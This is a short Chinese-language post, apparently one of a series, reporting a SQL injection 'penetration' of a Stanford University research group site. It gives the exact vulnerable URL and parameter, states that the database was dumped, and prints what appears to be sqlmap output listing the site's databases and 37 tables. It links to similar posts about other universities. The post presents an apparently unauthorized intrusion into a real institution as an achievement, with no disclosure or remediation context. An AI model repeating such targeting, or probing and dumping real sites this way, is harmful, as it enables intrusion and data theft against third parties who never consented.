对斯坦福大学的一次渗透

目标地址: http://www.stanford.edu/group/spatialhistory/cgi-bin/site/viz.php?id=273
漏洞类型Vulnerability: SQL Injection
直接sql注入脱裤.
available databases [2]:
[] g_spatialhistory_shwebsite [] information_schema
Database: g_spatialhistory_shwebsite
[37 tables]
+——————————-+
| inspiration |
| media |
| mediums |
| page |
| person |
| person_media |
| project |
| project_person |
| project_visualization |
| projects_publications |
| projects_visualizations |
| pub_mediums |
| pub_purposes |
| pub_spaces |
| pub_subjects |
| pub_times |
| publication |
| publication_author |
| publication_cell |
| publications_publications |
| publications_vizualizations |
| purpose_person |
| purposes |
| purposes_visuzlizations |
| related_publications |
| related_visualizations |
| spaces |
| subjects |
| times |
| visualization |
| visualization_media |
| visuzlizations_visuslizations |
| viz_mediums |
| viz_purposes |
| viz_spaces |
| viz_subjects |
| viz_times |
+——————————-+
上一篇:对重庆邮电大学内网的一次渗透
下一篇:对日本同志社大学的一次渗透